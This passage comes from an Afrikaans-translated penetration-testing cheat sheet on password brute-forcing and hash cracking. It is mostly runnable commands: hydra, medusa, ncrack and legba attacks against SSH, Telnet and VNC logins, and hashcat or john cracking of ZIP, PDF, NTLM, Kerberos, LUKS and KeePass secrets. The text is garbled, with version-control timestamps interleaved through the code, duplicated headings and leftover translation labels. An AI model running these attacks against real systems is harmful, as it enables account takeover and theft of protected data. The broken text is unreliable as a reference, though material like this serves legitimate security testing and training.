msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT
2021-05-13 16:02:48 +00:00
```
2023-01-21 22:02:49 +00:00
### SSH
2024-05-05 22:31:04 +00:00
SSH, of Secure Shell, is 'n kriptografiese netwerkprotokol wat gebruik word vir die veilige kommunikasie oor 'n onseker netwerk. SSH word dikwels gebruik vir die veilige afstandbeheer van rekenaars deur middel van 'n veilige datakanaal.
2023-01-21 22:02:49 +00:00
```bash
hydra -l root -P passwords.txt [-t 32] < IP > ssh
ncrack -p 22 --user root -P passwords.txt < IP > [-T 5]
medusa -u root -P 500-worst-passwords.txt -h < IP > -M ssh
patator ssh_login host=< ip > port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
2023-12-26 20:51:20 +00:00
legba ssh --username admin --password wordlists/passwords.txt --target localhost:22
# Try keys from a folder
legba ssh --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22
2023-01-21 22:02:49 +00:00
```
2024-03-17 16:40:53 +00:00
#### Swakke SSH-sleutels / Debian voorspelbare PRNG
2023-01-21 22:02:49 +00:00
2024-04-16 03:24:57 +00:00
Sommige stelsels het bekende foute in die lukrake saad wat gebruik word om kriptografiese materiaal te genereer. Dit kan lei tot 'n aansienlik verminderde sleutelruimte wat met gereedskap soos [snowdroppe/ssh-keybrute ](https://github.com/snowdroppe/ssh-keybrute ) gekraak kan word. Vooraf gegenereerde stelle swak sleutels is ook beskikbaar soos [g0tmi1k/debian-ssh ](https://github.com/g0tmi1k/debian-ssh ).
2023-12-26 20:51:20 +00:00
2024-02-11 02:07:06 +00:00
### STOMP (ActiveMQ, RabbitMQ, HornetQ en OpenMQ)
2020-07-15 15:43:14 +00:00
2024-05-05 22:31:04 +00:00
Die STOMP-teksporotokol is 'n wyd gebruikte boodskapporotokol wat **naatlose kommunikasie en interaksie met gewilde boodskapstoetsdiensdienste** soos RabbitMQ, ActiveMQ, HornetQ en OpenMQ moontlik maak. Dit bied 'n gestandaardiseerde en doeltreffende benadering om boodskappe uit te ruil en verskeie boodskapbedrywighede uit te voer.
2020-07-15 15:43:14 +00:00
```bash
2023-12-26 20:51:20 +00:00
legba stomp --target localhost:61613 --username admin --password data/passwords.txt
2020-07-15 15:43:14 +00:00
```
2022-05-01 13:25:53 +00:00
### Telnet
2020-07-15 15:43:14 +00:00
```bash
hydra -l root -P passwords.txt [-t 32] < IP > telnet
ncrack -p 23 --user root -P passwords.txt < IP > [-T 5]
medusa -u root -P 500-worst-passwords.txt -h < IP > -M telnet
2023-12-26 20:51:20 +00:00
legba telnet \
2024-02-11 02:07:06 +00:00
--username admin \
--password wordlists/passwords.txt \
--target localhost:23 \
--telnet-user-prompt "login: " \
--telnet-pass-prompt "Password: " \
--telnet-prompt ":~$ " \
--single-match # this option will stop the program when the first valid pair of credentials will be found, can be used with any plugin
2020-07-15 15:43:14 +00:00
```
2022-05-01 13:25:53 +00:00
### VNC
2020-07-15 15:43:14 +00:00
```bash
hydra -L /root/Desktop/user.txt – P /root/Desktop/pass.txt -s < PORT > < IP > vnc
2021-05-13 22:59:50 +00:00
medusa -h < IP > – u root -P /root/Desktop/pass.txt – M vnc
2020-07-15 15:43:14 +00:00
ncrack -V --user root -P /root/Desktop/pass.txt < IP > :>POR>T
2022-10-02 23:08:05 +00:00
patator vnc_login host=< IP > password=FILE0 0=/root/Desktop/pass.txt – t 1 – x retry:fgep!='Authentication failure' --max-retries 0 – x quit:code=0
use auxiliary/scanner/vnc/vnc_login
2024-04-16 03:24:57 +00:00
nmap -p 5900,5901 --script vnc-brute --script-args brute.credfile=wordlist.txt < IP >
2023-12-26 20:51:20 +00:00
legba vnc --target localhost:5901 --password data/passwords.txt
2022-01-10 10:36:14 +00:00
#Metasploit
use auxiliary/scanner/vnc/vnc_login
set RHOSTS < ip >
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst
2020-07-15 15:43:14 +00:00
```
2022-05-01 13:25:53 +00:00
### Winrm
2020-09-20 21:41:33 +00:00
```bash
crackmapexec winrm < IP > -d < Domain Name > -u usernames.txt -p passwords.txt
```
2024-05-05 22:31:04 +00:00
< figure > < img src = "../.gitbook/assets/image (48).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-08-31 22:35:39 +00:00
2024-03-17 16:40:53 +00:00
\
2024-05-05 22:31:04 +00:00
Gebruik [**Trickest** ](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks ) om maklik en **outomatiseer werkstrome** te bou wat aangedryf word deur die wêreld se **mees gevorderde** gemeenskapsinstrumente.\
2024-04-16 03:24:57 +00:00
Kry Vandaag Toegang:
2022-08-31 22:35:39 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics& utm_medium=banner& utm_source=hacktricks" %}
2024-02-11 02:07:06 +00:00
## Plaaslik
2020-07-15 15:43:14 +00:00
2024-03-17 16:40:53 +00:00
### Aanlyn kraak databasisse
2020-07-15 15:43:14 +00:00
2021-11-24 15:00:38 +00:00
* [~~http://hashtoolkit.com/reverse-hash?~~ ](http://hashtoolkit.com/reverse-hash? ) (MD5 & SHA1)
2024-02-11 02:07:06 +00:00
* [https://shuck.sh/get-shucking.php ](https://shuck.sh/get-shucking.php ) (MSCHAPv2/PPTP-VPN/NetNTLMv1 met/sonder ESS/SSP en met enige uitdaging se waarde)
2024-03-17 16:40:53 +00:00
* [https://www.onlinehashcrack.com/ ](https://www.onlinehashcrack.com ) (Hashe, WPA2 vangste, en argiewe MSOffice, ZIP, PDF...)
2024-02-11 02:07:06 +00:00
* [https://crackstation.net/ ](https://crackstation.net ) (Hashe)
2021-11-24 15:00:38 +00:00
* [https://md5decrypt.net/ ](https://md5decrypt.net ) (MD5)
2024-02-11 02:07:06 +00:00
* [https://gpuhash.me/ ](https://gpuhash.me ) (Hashe en lêerhashe)
* [https://hashes.org/search.php ](https://hashes.org/search.php ) (Hashe)
* [https://www.cmd5.org/ ](https://www.cmd5.org ) (Hashe)
2021-11-24 15:00:38 +00:00
* [https://hashkiller.co.uk/Cracker ](https://hashkiller.co.uk/Cracker ) (MD5, NTLM, SHA1, MySQL5, SHA256, SHA512)
* [https://www.md5online.org/md5-decrypt.html ](https://www.md5online.org/md5-decrypt.html ) (MD5)
* [http://reverse-hash-lookup.online-domain-tools.com/ ](http://reverse-hash-lookup.online-domain-tools.com )
2020-07-15 15:43:14 +00:00
2024-03-17 16:40:53 +00:00
Kyk hierna voordat jy probeer om 'n Hash met geweld te ontsyfer.
2020-07-15 15:43:14 +00:00
2022-05-01 13:25:53 +00:00
### ZIP
2020-07-15 15:43:14 +00:00
```bash
2024-02-11 02:07:06 +00:00
#sudo apt-get install fcrackzip
2020-07-15 15:43:14 +00:00
fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip
```
```bash
zip2john file.zip > zip.john
john zip.john
```
2021-02-21 10:41:35 +00:00
```bash
#$zip2$*0*3*0*a56cb83812be3981ce2a83c581e4bc4f*4d7b*24*9af41ff662c29dfff13229eefad9a9043df07f2550b9ad7dfc7601f1a9e789b5ca402468*694b6ebb6067308bedcd*$/zip2$
hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt
.\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attack
```
2024-05-05 22:31:04 +00:00
#### Bekende platte teks zip-aanval
2021-02-21 10:41:35 +00:00
2024-05-05 22:31:04 +00:00
Jy moet die **platte teks** (of 'n deel van die platte teks) **van 'n lêer wat binne-in** die versleutelde zip lê, ken. Jy kan **lêernaam en grootte van lêers wat binne-in** 'n versleutelde zip lê, nagaan deur: ** `7z l encrypted.zip` ** uit te voer.\
2024-03-29 21:15:52 +00:00
Laai [**bkcrack** ](https://github.com/kimci86/bkcrack/releases/tag/v1.4.0 ) af van die vrystellingsbladsy.
2022-06-08 21:20:05 +00:00
```bash
# You need to create a zip file containing only the file that is inside the encrypted zip
zip plaintext.zip plaintext.file
./bkcrack -C < encrypted.zip > -c < plaintext.file > -P < plaintext.zip > -p < plaintext.file >
2022-09-12 15:29:22 +00:00
# Now wait, this should print a key such as 7b549874 ebc25ec5 7e465e18
2022-06-08 21:20:05 +00:00
# With that key you can create a new zip file with the content of encrypted.zip
# but with a different pass that you set (so you can decrypt it)
2024-02-11 02:07:06 +00:00
./bkcrack -C < encrypted.zip > -k 7b549874 ebc25ec5 7e465e18 -U unlocked.zip new_pwd
2022-06-08 21:20:05 +00:00
unzip unlocked.zip #User new_pwd as password
```
2022-05-01 13:25:53 +00:00
### 7z
2020-07-15 15:43:14 +00:00
2024-05-05 22:31:04 +00:00
#### Brute Force Attack
'n Brute Force-aanval is 'n aanval wat poog om 'n wagwoord te agterhaal deur verskeie moontlike kombinasies van karakters te probeer totdat die regte een gevind word. Hierdie tegniek kan gebruik word om 'n 7z-lêer se wagwoord te agterhaal deur verskeie kombinasies van karakters te probeer totdat die regte wagwoord gevind word.
2020-07-15 15:43:14 +00:00
```bash
cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z
```
```bash
#Download and install requirements for 7z2john
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl
apt-get install libcompress-raw-lzma-perl
./7z2john.pl file.7z > 7zhash.john
```
2022-05-01 13:25:53 +00:00
### PDF
2020-07-15 15:43:14 +00:00
2024-05-05 22:31:04 +00:00
Afrikaans Translation:
### PDF
2020-07-15 15:43:14 +00:00
```bash
apt-get install pdfcrack
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
2022-09-12 15:29:22 +00:00
#pdf2john didn't work well, john didn't know which hash type was
2020-07-15 15:43:14 +00:00
# To permanently decrypt the pdf
sudo apt-get install qpdf
qpdf --password=< PASSWORD > --decrypt encrypted.pdf plaintext.pdf
```
2024-02-11 02:07:06 +00:00
### PDF Eienaar Wagwoord
2020-07-15 15:43:14 +00:00
2024-02-11 02:07:06 +00:00
Om 'n PDF Eienaar wagwoord te kraak, kyk hier: [https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/ ](https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/ )
2022-06-27 08:23:29 +00:00
2022-05-01 13:25:53 +00:00
### JWT
2020-07-15 15:43:14 +00:00
```bash
git clone https://github.com/Sjord/jwtcrack.git
cd jwtcrack
#Bruteforce using crackjwt.py
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
#Bruteforce using john
python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
john jwt.john #It does not work with Kali-John
```
2024-02-11 02:07:06 +00:00
### NTLM kraak
2020-07-15 15:43:14 +00:00
```bash
Format:USUARIO:ID:HASH_LM:HASH_NT:::
2021-10-05 14:53:03 +00:00
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes
2020-07-15 15:43:14 +00:00
hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot
```
2022-05-01 13:25:53 +00:00
### Keepass
2020-07-15 15:43:14 +00:00
```bash
sudo apt-get install -y kpcli #Install keepass tools like keepass2john
keepass2john file.kdbx > hash #The keepass is only using password
2022-09-12 15:29:22 +00:00
keepass2john -k < file-password > file.kdbx > hash # The keepass is also using a file as a needed credential
#The keepass can use a password and/or a file as credentials, if it is using both you need to provide them to keepass2john
2020-07-15 15:43:14 +00:00
john --wordlist=/usr/share/wordlists/rockyou.txt hash
```
2024-03-17 16:40:53 +00:00
### Keberoasting
2020-07-15 15:43:14 +00:00
```bash
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
```
2024-02-11 02:07:06 +00:00
### Lucks beeld
2020-07-15 15:43:14 +00:00
2024-02-11 02:07:06 +00:00
#### Metode 1
2020-07-15 15:43:14 +00:00
2024-02-11 02:07:06 +00:00
Installeer: [https://github.com/glv2/bruteforce-luks ](https://github.com/glv2/bruteforce-luks )
2020-07-15 15:43:14 +00:00
```bash
bruteforce-luks -f ./list.txt ./backup.img
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt
```
2024-02-11 02:07:06 +00:00
#### Metode 2
2020-07-15 15:43:14 +00:00
```bash
cryptsetup luksDump backup.img #Check that the payload offset is set to 4096
dd if=backup.img of=luckshash bs=512 count=4097 #Payload offset +1
2020-12-23 13:35:45 +00:00
hashcat -m 14600 -a 0 luckshash wordlists/rockyou.txt
2020-07-15 15:43:14 +00:00
cryptsetup luksOpen backup.img mylucksopen
ls /dev/mapper/ #You should find here the image mylucksopen
mount /dev/mapper/mylucksopen /mnt
```
2024-04-16 03:24:57 +00:00
'n Ander Luks BF-handleiding: [http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1 ](http://blog.dclabs.com.br/2020/03/bruteforcing-linux-disk-encription-luks.html?m=1 )
2024-05-05 22:31:04 +00:00
### Mysql
2020-07-15 15:43:14 +00:00
```bash
#John hash format
< USERNAME > :$mysqlna$< CHALLENGE > *< RESPONSE >
dbuser:$mysqlna$112233445566778899aabbccddeeff1122334455*73def07da6fba5dcc1b19c918dbd998e0d1f3f9d
```
2024-02-11 02:07:06 +00:00
### PGP/GPG Privaatsleutel
2021-09-27 14:59:59 +00:00
```bash
2022-09-12 15:29:22 +00:00
gpg2john private_pgp.key #This will generate the hash and save it in a file
2021-09-27 14:59:59 +00:00
john --wordlist=/usr/share/wordlists/rockyou.txt ./hash
```
2022-09-30 10:43:59 +00:00
### Cisco
2024-05-05 22:31:04 +00:00
< figure > < img src = "../.gitbook/assets/image (663).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-09-30 10:43:59 +00:00
2024-04-16 03:24:57 +00:00
### DPAPI Meester Sleutel
2022-05-19 12:02:10 +00:00
2024-05-05 22:31:04 +00:00
Gebruik [https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py ](https://github.com/openwall/john/blob/bleeding-jumbo/run/DPAPImk2john.py ) en hardloop dan john
2022-02-07 10:56:05 +00:00
2024-03-17 16:40:53 +00:00
### Open Office Wagwoord Beskermde Kolom
2022-02-07 10:56:05 +00:00
2024-05-05 22:31:04 +00:00
As jy 'n xlsx-lêer het met 'n kolom wat beskerm word deur 'n wagwoord, kan jy dit ontsluit:
2022-02-07 10:56:05 +00:00
2024-02-11 02:07:06 +00:00
* **Laai dit op na Google Drive** en die wagwoord sal outomaties verwyder word
* Om dit **handmatig te verwyder** :
2022-02-07 10:56:05 +00:00
```bash
unzip file.xlsx
grep -R "sheetProtection" ./*
2022-04-05 22:24:52 +00:00
# Find something like: <sheetProtection algorithmName="SHA-512"
hashValue="hFq32ZstMEekuneGzHEfxeBZh3hnmO9nvv8qVHV8Ux+t+39/22E3pfr8aSuXISfrRV9UVfNEzidgv+Uvf8C5Tg" saltValue="U9oZfaVCkz5jWdhs9AA8nA" spinCount="100000" sheet="1" objects="1" scenarios="1"/>
2022-02-07 10:56:05 +00:00
# Remove that line and rezip the file
zip -r file.xls .
```
2024-02-11 02:07:06 +00:00
### PFX Sertifikate
2022-02-07 12:08:46 +00:00
```bash
# From https://github.com/Ridter/p12tool
./p12tool crack -c staff.pfx -f /usr/share/wordlists/rockyou.txt
2022-04-05 21:52:22 +00:00
# From https://github.com/crackpkcs12/crackpkcs12
crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx
2022-02-07 12:08:46 +00:00
```
2024-05-05 22:31:04 +00:00
< figure > < img src = "../.gitbook/assets/image (48).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-08-31 22:35:39 +00:00
2024-03-17 16:40:53 +00:00
\
2024-05-05 22:31:04 +00:00
Gebruik [**Trickest** ](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks ) om maklik **werkstrome te bou** en outomatiseer met die wêreld se **mees gevorderde** gemeenskapsinstrumente.\
2024-03-17 16:40:53 +00:00
Kry Vandaag Toegang:
2022-08-31 22:35:39 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics& utm_medium=banner& utm_source=hacktricks" %}
2024-02-11 02:07:06 +00:00
## Gereedskap
2020-07-15 15:43:14 +00:00
2024-02-11 02:07:06 +00:00
**Hash-voorbeelde:** [https://openwall.info/wiki/john/sample-hashes ](https://openwall.info/wiki/john/sample-hashes )
2020-07-15 15:43:14 +00:00
2024-02-11 02:07:06 +00:00
### Hash-identifiseerder
2020-07-15 15:43:14 +00:00
```bash
hash-identifier
> <HASH>
```
2024-02-11 02:07:06 +00:00
### Woordlyste
2022-08-14 12:59:30 +00:00
* **Rockyou**
2022-09-23 17:52:05 +00:00
* [**Probable-Wordlists** ](https://github.com/berzerk0/Probable-Wordlists )
* [**Kaonashi** ](https://github.com/kaonashi-passwords/Kaonashi/tree/master/wordlists )
2024-03-17 16:40:53 +00:00
* [**Seclists - Passwords** ](https://github.com/danielmiessler/SecLists/tree/master/Passwords )
2022-08-14 12:59:30 +00:00
2024-05-05 22:31:04 +00:00
### **Woordlys-genereringstools**
2022-08-14 12:59:30 +00:00
2024-05-05 22:31:04 +00:00
* [**kwprocessor** ](https://github.com/hashcat/kwprocessor )**:** Gevorderde sleutelbord-stap-generator met instelbare basis karakters, sleutelkaart en roetes.
2022-08-14 12:59:30 +00:00
```bash
kwp64.exe basechars\custom.base keymaps\uk.keymap routes\2-to-10-max-3-direction-changes.route -o D:\Tools\keywalk.txt
```
2024-02-11 02:07:06 +00:00
### John mutasie
2022-08-14 12:59:30 +00:00
2024-03-17 16:40:53 +00:00
Lees _**/etc/john/john.conf**_ en konfigureer dit
2020-07-15 15:43:14 +00:00
```bash
john --wordlist=words.txt --rules --stdout > w_mutated.txt
john --wordlist=words.txt --rules=all --stdout > w_mutated.txt #Apply all rules
```
2022-05-01 13:25:53 +00:00
### Hashcat
2020-07-15 15:43:14 +00:00
2024-03-17 16:40:53 +00:00
#### Hashcat aanvalle
2022-08-14 12:59:30 +00:00
2024-03-17 16:40:53 +00:00
* **Woordelys aanval** (`-a 0`) met reëls
2022-08-14 12:59:30 +00:00
2024-02-11 02:07:06 +00:00
**Hashcat** kom reeds met 'n **gids wat reëls bevat** , maar jy kan [**ander interessante reëls hier vind** ](https://github.com/kaonashi-passwords/Kaonashi/tree/master/rules ).
2022-08-14 12:59:30 +00:00
```
hashcat.exe -a 0 -m 1000 C:\Temp\ntlm.txt .\rockyou.txt -r rules\best64.rule
```
2024-03-17 16:40:53 +00:00
* **Woordelys kombinasie** aanval
2022-08-14 12:59:30 +00:00
2024-02-11 02:07:06 +00:00
Dit is moontlik om **2 woordelyste in 1 te kombineer** met hashcat.\
2024-05-05 22:31:04 +00:00
As lys 1 die woord ** "hello"** bevat het en die tweede 2 reëls met die woorde ** "world"** en ** "earth"** bevat het. Die woorde `helloworld` en `helloearth` sal gegenereer word.
2022-08-14 12:59:30 +00:00
```bash
# This will combine 2 wordlists
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt
# Same attack as before but adding chars in the newly generated words
2022-09-12 15:29:22 +00:00
# In the previous example this will generate:
2022-09-23 17:52:05 +00:00
## hello-world!
2022-08-14 12:59:30 +00:00
## hello-earth!
hashcat.exe -a 1 -m 1000 C:\Temp\ntlm.txt .\wordlist1.txt .\wordlist2.txt -j $- -k $!
```
2024-02-11 02:07:06 +00:00
* **Mask aanval** (`-a 3`)
2022-08-14 12:59:30 +00:00
```bash
# Mask attack with simple mask
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt ?u?l?l?l?l?l?l?l?d
hashcat --help #will show the charsets and are as follows
? | Charset
===+=========
l | abcdefghijklmnopqrstuvwxyz
u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
d | 0123456789
h | 0123456789abcdef
H | 0123456789ABCDEF
s | !"#$%&'()*+,-./:; < =>?@[\]^_`{|}~
a | ?l?u?d?s
b | 0x00 - 0xff
2022-09-12 15:29:22 +00:00
# Mask attack declaring custom charset
2022-08-14 12:59:30 +00:00
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt -1 ?d?s ?u?l?l?l?l?l?l?l?1
2022-09-23 17:52:05 +00:00
## -1 ?d?s defines a custom charset (digits and specials).
## ?u?l?l?l?l?l?l?l?1 is the mask, where "?1" is the custom charset.
2022-08-14 12:59:30 +00:00
# Mask attack with variable password length
## Create a file called masks.hcmask with this content:
?d?s,?u?l?l?l?l?1
?d?s,?u?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?1
?d?s,?u?l?l?l?l?l?l?l?l?1
## Use it to crack the password
hashcat.exe -a 3 -m 1000 C:\Temp\ntlm.txt .\masks.hcmask
```
2024-02-11 02:07:06 +00:00
* Woordelys + Masker (`-a 6`) / Masker + Woordelys (`-a 7`) aanval
2022-08-14 12:59:30 +00:00
```bash
# Mask numbers will be appended to each word in the wordlist
hashcat.exe -a 6 -m 1000 C:\Temp\ntlm.txt \wordlist.txt ?d?d?d?d
# Mask numbers will be prepended to each word in the wordlist
hashcat.exe -a 7 -m 1000 C:\Temp\ntlm.txt ?d?d?d?d \wordlist.txt
```
2024-03-17 16:40:53 +00:00
#### Hashcat metodes
2020-07-15 15:43:14 +00:00
```bash
hashcat --example-hashes | grep -B1 -A2 "NTLM"
```
2024-04-16 03:24:57 +00:00
### Brute Force
2024-05-05 22:31:04 +00:00
Brute force is a common password cracking technique where every possible combination of letters, numbers, and symbols are tried until the correct password is found. This method can be used to crack Linux password hashes stored in the `/etc/shadow` file.
2024-04-06 18:08:38 +00:00
2024-04-16 03:24:57 +00:00
### Brute Force
2024-05-05 22:31:04 +00:00
Brute force is 'n algemene wagwoordkraaktegniek waar elke moontlike kombinasie van letters, syfers, en simbole uitgeprobeer word totdat die regte wagwoord gevind word. Hierdie metode kan gebruik word om Linux wagwoordhasies wat in die `/etc/shadow` lêer gestoor word, te kraak.
2021-11-24 15:00:38 +00:00
```
2024-02-11 02:07:06 +00:00
500 | md5crypt $1$, MD5(Unix) | Operating-Systems
2020-07-15 15:43:14 +00:00
3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems
7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems
1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems
```
2024-05-05 22:31:04 +00:00
### Brute Force
2020-07-15 15:43:14 +00:00
2024-05-05 22:31:04 +00:00
#### Brute Forcing Windows Hashes
2024-04-06 18:08:38 +00:00
2024-05-05 22:31:04 +00:00
Brute forcing Windows hashes involves attempting all possible password combinations until the correct one is found. This can be achieved using tools like **John the Ripper** or **Hashcat** . The process can be time-consuming depending on the complexity of the password.
2021-11-24 15:00:38 +00:00
```
2020-07-15 15:43:14 +00:00
3000 | LM | Operating-Systems
1000 | NTLM | Operating-Systems
```
2024-05-05 22:31:04 +00:00
### Kraak van Gewone Aansoek-Hashes
2021-11-24 15:00:38 +00:00
```
2024-02-11 02:07:06 +00:00
900 | MD4 | Raw Hash
0 | MD5 | Raw Hash
5100 | Half MD5 | Raw Hash
100 | SHA1 | Raw Hash
2020-07-15 15:43:14 +00:00
10800 | SHA-384 | Raw Hash
2024-02-11 02:07:06 +00:00
1400 | SHA-256 | Raw Hash
1700 | SHA-512 | Raw Hash
2020-07-15 15:43:14 +00:00
```
2022-04-28 16:01:33 +00:00
< details >
2024-03-17 16:40:53 +00:00
< summary > < strong > Leer AWS-hacking vanaf nul tot held met< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-11 02:07:06 +00:00
Ander maniere om HackTricks te ondersteun:
2023-12-30 10:12:47 +00:00
2024-04-16 03:24:57 +00:00
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai** Kyk na die [**INSKRYWINGSPLANNE** ](https://github.com/sponsors/carlospolop )!
2024-02-11 02:07:06 +00:00
* Kry die [**amptelike PEASS & HackTricks swag** ](https://peass.creator-spring.com )
2024-05-05 22:31:04 +00:00
* Ontdek [**Die PEASS-familie** ](https://opensea.io/collection/the-peass-family ), ons versameling eksklusiewe [**NFT's** ](https://opensea.io/collection/the-peass-family )
2024-03-17 16:40:53 +00:00
* **Sluit aan by die** 💬 [**Discord-groep** ](https://discord.gg/hRep4RUj7f ) of die [**telegram-groep** ](https://t.me/peass ) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
2024-05-05 22:31:04 +00:00
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) en [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github-opslag.
2022-04-28 16:01:33 +00:00
< / details >
2022-08-31 22:35:39 +00:00
2024-05-05 22:31:04 +00:00
< figure > < img src = "../.gitbook/assets/image (48).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-08-31 22:35:39 +00:00
\
2024-05-05 22:31:04 +00:00
Gebruik [**Trickest** ](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks ) om maklik te bou en **werkstrome outomatiseer** wat aangedryf word deur die wêreld se **mees gevorderde** gemeenskapshulpmiddels.\
2024-04-16 03:24:57 +00:00
Kry Vandag Toegang:
2022-08-31 22:35:39 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics& utm_medium=banner& utm_source=hacktricks" %}